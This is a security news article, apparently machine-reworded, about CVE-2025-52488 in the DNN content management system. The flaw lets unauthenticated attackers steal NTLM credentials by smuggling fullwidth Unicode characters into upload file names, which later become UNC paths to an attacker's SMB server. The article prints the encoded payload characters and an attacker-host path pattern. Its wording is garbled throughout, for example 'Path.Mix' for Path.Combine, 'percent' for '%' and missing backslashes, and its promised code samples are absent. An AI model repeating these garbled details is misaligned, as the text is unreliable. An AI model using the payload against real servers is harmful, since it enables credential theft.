A important vulnerability in DNN (previously DotNetNuke) that enables attackers to steal NTLM credentials by a classy Unicode normalization bypass approach.
The vulnerability, tracked as CVE-2025-52488, impacts one of many oldest open-source content material administration programs and demonstrates how defensive coding measures might be circumvented by intelligent exploitation of Home windows and .NET quirks.
Key Takeaways1. CVE-2025-52488 in DNN permits attackers to steal NTLM credentials with out requiring person authentication.2. Particular Unicode characters (U+FF0E, U+FF3C) normalize into dots and backslashes after passing safety validation, bypassing safety mechanisms.3. Malicious filenames remodel into UNC paths (attacker.comshare) that set off SMB connections to attacker-controlled servers through File.Exists.4. Permits NTLM credential theft affecting enterprises and demonstrating how defensive coding might be circumvented by character encoding.
NTLM Credential Leak
Searchlight Cyber experiences that the vulnerability exploits a elementary weak spot in how .NET purposes deal with file system operations on Home windows machines.
When attackers management file paths, they’ll present UNC (Common Naming Conference) paths that set off out-of-band calls to attacker-controlled SMB servers.
This mechanism turns into notably harmful when mixed with features like File.Exists, System.Web.HttpRequest, and System.Web.WebClient, which may inadvertently leak NTLM credentials to malicious servers.
The assault leverages the Path.Mix operate’s habits in C#, the place if the second argument incorporates an absolute path, the primary argument is totally ignored.
In response to Microsoft documentation, “if an argument apart from the primary incorporates a rooted path, any earlier path elements are ignored, and the returned string begins with that rooted path part.”
This habits, whereas documented, ceaselessly results in safety vulnerabilities in C# codebases.
Technical evaluation reveals that the core of this vulnerability lies in DNN’s Unicode dealing with course of.
The applying implements a number of safety boundaries to stop malicious file uploads, together with Path.GetFileName calls, regex replacements, and validation features like Utility.ValidateFileName and Utility.CleanFileName.
Nevertheless, these safety checks happen earlier than the essential Utility.ConvertUnicodeChars operate. The susceptible code part reveals:
The ConvertUnicodeChars operate incorporates the important vulnerability on this line:
This normalization course of converts Unicode characters to ASCII equivalents, successfully bypassing all beforehand applied safety measures.
Researchers found particular Unicode characters that normalize into harmful path elements:
%EFpercentBCpercent8E (U+FF0E): “FULLWIDTH FULL STOP” normalizes to “.”
%EFpercentBCpercentBC (U+FF3C): “FULLWIDTH REVERSE SOLIDUS” normalizes to “”
These characters enable attackers to assemble malicious filenames that seem protected throughout preliminary validation however remodel into UNC paths after normalization. The exploit payload demonstrates this:
When processed, this turns into: attacker.comsharefile.jpg, triggering an SMB connection that leaks NTLM credentials to the attacker’s Responder server.
Threat FactorsDetailsAffected ProductsDNN – All variations with DNNConnect.CKE HTML Editor ProviderImpactNTLM credential theftExploit Stipulations– No authentication required (pre-authentication vulnerability)- Goal system operating DNN with file add functionality- Home windows surroundings with SMB enabled- Attacker-controlled server to obtain NTLM hashesCVSS 3.1 Score8.6 (Excessive)
This vulnerability highlights the complexity of Unicode dealing with in net purposes and demonstrates how defensive programming measures might be undermined by character encoding transformations.
The pre-authentication nature of this vulnerability makes it notably harmful, because it requires no person credentials to use and may compromise area credentials by NTLM relay assaults.
Examine reside malware habits, hint each step of an assault, and make sooner, smarter safety selections -> Strive ANY.RUN now